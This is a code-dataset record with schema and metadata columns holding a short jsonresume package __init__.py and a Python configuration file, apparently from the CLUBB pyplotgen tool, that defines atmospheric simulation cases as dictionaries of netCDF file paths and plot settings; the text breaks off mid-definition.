hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
a73131170f5bdfaf1161caf237d671d9dbf5663d
253
py
Python
jsonresume/__init__.py
kelvintaywl/jsonresume-validator
73ac162cb30ca70699c942def629188f7dfd4d3c
[ "MIT" ]
42
2016-06-03T18:17:24.000Z
2021-12-09T04:13:14.000Z
jsonresume/__init__.py
kelvintaywl/jsonresume-validator
73ac162cb30ca70699c942def629188f7dfd4d3c
[ "MIT" ]
3
2016-04-27T12:32:41.000Z
2020-09-29T16:43:35.000Z
jsonresume/__init__.py
kelvintaywl/jsonresume-validator
73ac162cb30ca70699c942def629188f7dfd4d3c
[ "MIT" ]
9
2016-05-08T15:31:53.000Z
2021-04-28T09:17:47.000Z
# -*- coding: utf-8 -*- """ JSON Resume Validator ~~~~~~ JSON Resume Validator helps validate python dictionaries to ensure they are valid representation of a JSON Resume. """ from jsonresume.resume import Resume __all__ = ['Resume']
19.461538
63
0.675889
30
253
5.566667
0.733333
0.179641
0.227545
0
0
0
0
0
0
0
0
0.005025
0.213439
253
12
64
21.083333
0.834171
0.660079
0
0
0
0
0.096774
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
a739bd10614848db1a73028a77c6c885008e1463
63,679
py
Python
postprocessing/pyplotgen/config/Case_definitions.py
larson-group/clubb_release
b4d671e3e238dbe00752c0dead6a0d4f9897350a
[ "Intel", "Unlicense", "NetCDF" ]
null
null
null
postprocessing/pyplotgen/config/Case_definitions.py
larson-group/clubb_release
b4d671e3e238dbe00752c0dead6a0d4f9897350a
[ "Intel", "Unlicense", "NetCDF" ]
null
null
null
postprocessing/pyplotgen/config/Case_definitions.py
larson-group/clubb_release
b4d671e3e238dbe00752c0dead6a0d4f9897350a
[ "Intel", "Unlicense", "NetCDF" ]
1
2022-01-28T22:22:04.000Z
2022-01-28T22:22:04.000Z
""" :author: Nicolas Strike :date: Early 2019 This file is mostly a definition of Cases. Each case is defined in the following format using python dictionaries (values surrounded with < > must have the < > removed to be valid). .. code-block:: python :linenos: CASENAME = {'name': 'casename', 'description': "", 'start_time': <numeric value>, 'end_time': <numeric value>, 'height_min_value': <numeric value>, 'height_max_value': <numeric value>, 'blacklisted_vars': ['list', 'of', 'variable', 'names', 'to', 'exclude', 'from', 'plotting'], 'sam_benchmark_file': <path to sam file>", 'clubb_file': {'zm': <path to file>, 'zt': <path to file>, 'sfc': <path to file>}, 'coamps_benchmark_file': {'sm': <path to file>, 'sw': <path to file>}, 'clubb_r408_benchmark_file': {'zm': <path to file>, 'zt': <path to file>, 'sfc': <path to file>}, 'clubb_hoc_benchmark_file': {'zm': <path to file>', 'zt': <path to file>', 'sfc': <path to file>}, 'e3sm_file': <path to file>, 'cam_file': <path to file>, 'sam_file': <path to file>, 'wrf_file': {'zm': <path to file>, 'zt': <path to file>, 'sfc': <path to file>}, 'var_groups': [VariableGroupBase, <other variable groups to plot>]} **Important note**: When creating a new case, add it to the CASES_TO_PLOT list at the bottom of the file. Additionally, please add it in alphabetical order. **Case Definition values explained**: *name*: must be the same as the filename without the extention. E.g. to use lba_zt.nc and lba_zm.nc the case's name must be 'lba'. Extensions are determined by the last instance of _ *start_time*: An integer value representing which timestep to begin the time-averaging interval. Valid options are from 1 -> list minute value. Give in terms of clubb minutes. *end_time*: An integer value representing which timestep to end the time-averaging interval. Valid options are from 1 -> list minute value. Give in terms of clubb minutes. Also used to determine where to stop timeseries plots *height_min_value*: The elevation to begin height plots at *height_max_value*: The elevation to end height plots at *blacklisted_vars*: List of variables to avoid plotting for this case. Names must use the clubb-name version *<model name>_file*: The path(s) to nc files for the given model. (please use the <model name>_OUTPUT_ROOT variables as the beginning of the path). *var_groups*: These are the groups of variables to be plotted for the given case. var_groups is defined as a list of python class names, where the classes use the naming scheme VariableGroup____.py and define a variable group. An example would be: 'var_groups': [VariableGroupBase, VariableGroupWs]. The variables inside a VariableGroup can be found in the file with the same name, i.e. config/VariableGroupBase.py. An example would be thlm in VariableGroupBase. """ import os from config.VariableGroupBase import VariableGroupBase from config.VariableGroupCorrelations import VariableGroupCorrelations from config.VariableGroupIceMP import VariableGroupIceMP from config.VariableGroupKKMP import VariableGroupKKMP from config.VariableGroupLiquidMP import VariableGroupLiquidMP from config.VariableGroupSamProfiles import VariableGroupSamProfiles from config.VariableGroupScalars import VariableGroupScalars from config.VariableGroupWs import VariableGroupWs from config.VariableGroupTaus import VariableGroupTaus from config.VariableGroupNondimMoments import VariableGroupNondimMoments from config.VariableGroupNormalizedVariations import VariableGroupNormalizedVariations # --------------------------- BENCHMARK_OUTPUT_ROOT = "/home/pub/les_and_clubb_benchmark_runs/" if not os.path.isdir(BENCHMARK_OUTPUT_ROOT) and \ not os.path.islink(BENCHMARK_OUTPUT_ROOT): print("Benchmark output was not found in " + BENCHMARK_OUTPUT_ROOT + ".\n\tChecking local location: " + os.path.dirname(os.path.realpath(__file__)) + "/../les_and_clubb_benchmark_runs/") BENCHMARK_OUTPUT_ROOT = os.path.dirname(os.path.realpath(__file__)) + "/../les_and_clubb_benchmark_runs/" SAM_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "sam_benchmark_runs" COAMPS_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "les_runs" WRF_LASSO_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "wrf_lasso_runs" ARCHIVED_CLUBB_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "archived_clubb_runs" R408_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "" HOC_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "HOC_20051217" # This folder is passed in as a command line parameter # It is not capitalized because it is not intended to # be final, i.e. is changed depending on the cmd line arg e3sm_output_root = "" sam_output_root = "" wrf_output_root = "" cam_output_root = "" clubb_output_root = "" # --------------------------- # These are all the names that represent the height variable within different models HEIGHT_VAR_NAMES = ['z', 'Z3', 'altitude', 'lev', 'CSP_Zm', 'CSP_Z8Wm'] # CSP_* added for WRF-LASSO cases TIME_VAR_NAMES = ['time', 'XTIME'] """ To plot only a subset of cases, reguardless of what output exists in the clubb folder, uncomment the last line of this file and fill that array with the cases you'd like to plot. This overwrites the CASES_TO_PLOT variable such that pyplotgen will only know about cases in that list and ignore all others. The name must match the python variable name below (all caps). For example, to plot only bomex and fire: CASES_TO_PLOT = [BOMEX, FIRE] """ ARM = {'name': 'arm', 'description': "Output may differ from plotgen in some models (e.g. WRF) due to a difference in the time " "averaging interval.", 'start_time': 481, 'end_time': 540, 'height_min_value': 0, 'height_max_value': 3500, 'blacklisted_vars': ['radht'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/ARM_96x96x110/GCSSARM_96x96x110_67m_40m_1s.nc"}, 'clubb_file': {'zm': clubb_output_root + '/arm_zm.nc', 'zt': clubb_output_root + '/arm_zt.nc', 'sfc': clubb_output_root + '/arm_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/arm_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/arm_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/arm_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/arm_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/arm_sfc.nc'}, 'e3sm_file': { 'e3sm': e3sm_output_root + "/arm.nc"}, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/GCSSARM_96x96x110_67m_40m_1s.nc"}, 'wrf_file': {'zm': wrf_output_root + "/arm_zm_wrf.nc", 'zt': wrf_output_root + "/arm_zt_wrf.nc", 'sfc': wrf_output_root + "/arm_sfc_wrf.nc" }, 'var_groups': [VariableGroupBase, VariableGroupWs]} ARM_97 = {'name': 'arm_97', 'description': "", 'start_time': 4321, 'end_time': 5580, 'height_min_value': 0, 'height_max_value': 18000, 'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'thlp3', 'rtpthvp', 'thlpthvp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/ARM97_r1315_128x128x128_1km_Morrison/ARM9707.nc"}, 'clubb_file': {'zm': clubb_output_root + '/arm_97_zm.nc', 'zt': clubb_output_root + '/arm_97_zt.nc', 'sfc': clubb_output_root + '/arm_97_sfc.nc', 'subcolumns': clubb_output_root + '/arm_97_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/ARM9707_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]} ASTEX_A209 = {'name': 'astex_a209', 'description': "", 'start_time': 2340, 'end_time': 2400, 'height_min_value': 0, 'height_max_value': 6000, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/astex_a209_zm.nc', 'zt': clubb_output_root + '/astex_a209_zt.nc', 'sfc': clubb_output_root + '/astex_a209_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations, VariableGroupKKMP]} ATEX = {'name': 'atex', 'description': "", 'start_time': 421, 'end_time': 480, 'height_min_value': 0, 'height_max_value': 2500, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/atex_zm.nc', 'zt': clubb_output_root + '/atex_zt.nc', 'sfc': clubb_output_root + '/atex_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/atex_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/atex_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/atex_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/atex_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/atex_sfc.nc'}, 'e3sm_file': None, 'cam_file': {'cam': cam_output_root + "/atex_cam.nc"}, 'sam_file': None, 'wrf_file': {'zm': wrf_output_root + "/atex_zm_wrf.nc", 'zt': wrf_output_root + "/atex_zt_wrf.nc", 'sfc': wrf_output_root + "/atex_sfc_wrf.nc" }, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]} BOMEX = {'name': 'bomex', 'description': "", 'start_time': 181, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 2500, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/BOMEX_64x64x75/BOMEX_64x64x75_100m_40m_1s.nc"}, 'clubb_file': {'zm': clubb_output_root + '/bomex_zm.nc', 'zt': clubb_output_root + '/bomex_zt.nc', 'sfc': clubb_output_root + '/bomex_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/bomex_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/bomex_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/bomex_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/bomex_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/bomex_sfc.nc'}, 'e3sm_file': { 'e3sm': e3sm_output_root + '/bomex.nc'}, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/BOMEX_SAM_CLUBB.nc"}, 'wrf_file': {'zm': wrf_output_root + '/bomex_zm_wrf.nc', 'zt': wrf_output_root + '/bomex_zt_wrf.nc', 'sfc': wrf_output_root + '/bomex_sfc_wrf.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} CGILS_S6 = {'name': 'cgils_s6', 'description': "", 'start_time': 12960, 'end_time': 14400, 'height_min_value': 0, 'height_max_value': 5950, 'blacklisted_vars': ['Ngm', 'rgm', 'Skrt_zt', 'Skthl_zt', 'thlp3', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/CLOUD_FEEDBACK_s6/ctl_s6_96x96x128_100m_DRZ_N100_tqndg.nc"}, 'clubb_file': {'zm': clubb_output_root + '/cgils_s6_zm.nc', 'zt': clubb_output_root + '/cgils_s6_zt.nc', 'sfc': clubb_output_root + '/cgils_s6_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} CGILS_S11 = {'name': 'cgils_s11', 'description': "", 'start_time': 12960, 'end_time': 14400, 'height_min_value': 0, 'height_max_value': 5950, 'blacklisted_vars': ['Ngm', 'rgm', 'Skthl_zt', 'Skrt_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/CLOUD_FEEDBACK_s11/ctl_s11_96x96x320_50m_DRZ_N100_ref.nc"}, 'clubb_file': {'zm': clubb_output_root + '/cgils_s11_zm.nc', 'zt': clubb_output_root + '/cgils_s11_zt.nc', 'sfc': clubb_output_root + '/cgils_s11_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} CGILS_S12 = {'name': 'cgils_s12', 'description': "", 'start_time': 12960, 'end_time': 14400, 'height_min_value': 0, 'height_max_value': 5950, 'blacklisted_vars': ['Ngm', 'rgm', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/CLOUD_FEEDBACK_s12/ctl_s12_96x96x192_25m_DRZ_N100_fixnudge.nc"}, 'clubb_file': {'zm': clubb_output_root + '/cgils_s12_zm.nc', 'zt': clubb_output_root + '/cgils_s12_zt.nc', 'sfc': clubb_output_root + '/cgils_s12_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} CLEX9_NOV02 = {'name': 'clex9_nov02', 'description': "", 'start_time': 181, 'end_time': 240, 'height_min_value': 4000, 'height_max_value': 6072, 'blacklisted_vars': ['Ngm'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/clex9_nov02_zm.nc', 'zt': clubb_output_root + '/clex9_nov02_zt.nc', 'sfc': clubb_output_root + '/clex9_nov02_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_nov02_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_nov02_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} CLEX9_OCT14 = {'name': 'clex9_oct14', 'description': "", 'start_time': 181, 'end_time': 240, 'height_min_value': 2230, 'height_max_value': 6688, 'blacklisted_vars': ['Ngm'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/clex9_oct14_zm.nc', 'zt': clubb_output_root + '/clex9_oct14_zt.nc', 'sfc': clubb_output_root + '/clex9_oct14_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} DYCOMS2_RF01 = {'name': 'dycoms2_rf01', 'description': "", 'start_time': 181, 'end_time': 240, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF01_96x96x320/DYCOMS_RF01_96x96x320.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf01_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf01_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf01_sfc.nc'}, 'e3sm_file': { 'e3sm': e3sm_output_root + "/dycoms2_rf01.nc"}, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs]} DYCOMS2_RF01_FIXED_SST = {'name': 'dycoms2_rf01_fixed_sst', 'description': "Copied from plotgen: Ran with a 5 min timestep and a 48-level grid", 'start_time': 2520, 'end_time': 2700, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/DYCOMS_RF01_fixed_sst/DYCOMS_RF01_96x96x320_LES_fixed_sst.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_fixed_sst_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf01_fixed_sst_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf01_fixed_sst_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase]} DYCOMS2_RF02_DO = {'name': 'dycoms2_rf02_do', 'description': "", 'start_time': 301, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_dr_nosed/DYCOMS_RF02_128x128x96_dr_nosed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_do_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_do_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_do_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations, VariableGroupKKMP]} DYCOMS2_RF02_DS = {'name': 'dycoms2_rf02_ds', 'description': "", 'start_time': 301, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_ds_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_ds_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'}, 'e3sm_file': {'e3sm': e3sm_output_root + "/dycoms2_rf02_ds.nc"}, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations, VariableGroupKKMP]} DYCOMS2_RF02_ND = {'name': 'dycoms2_rf02_nd', 'description': "Copied from plotgen: ** Generated by doing a restart run after 7200 seconds. Note: " "t = 0 corresponds to start time of the restart run, not the original run. ** ", 'start_time': 301, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': ['wprrp', 'wpNrp', 'corr_w_rr_1', 'corr_w_Nr_1'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_nodr_nosed/DYCOMS_RF02_128x128x96_nodr_nosed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_nd_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_nd_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_nd_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]} DYCOMS2_RF02_DS_RESTART = {'name': 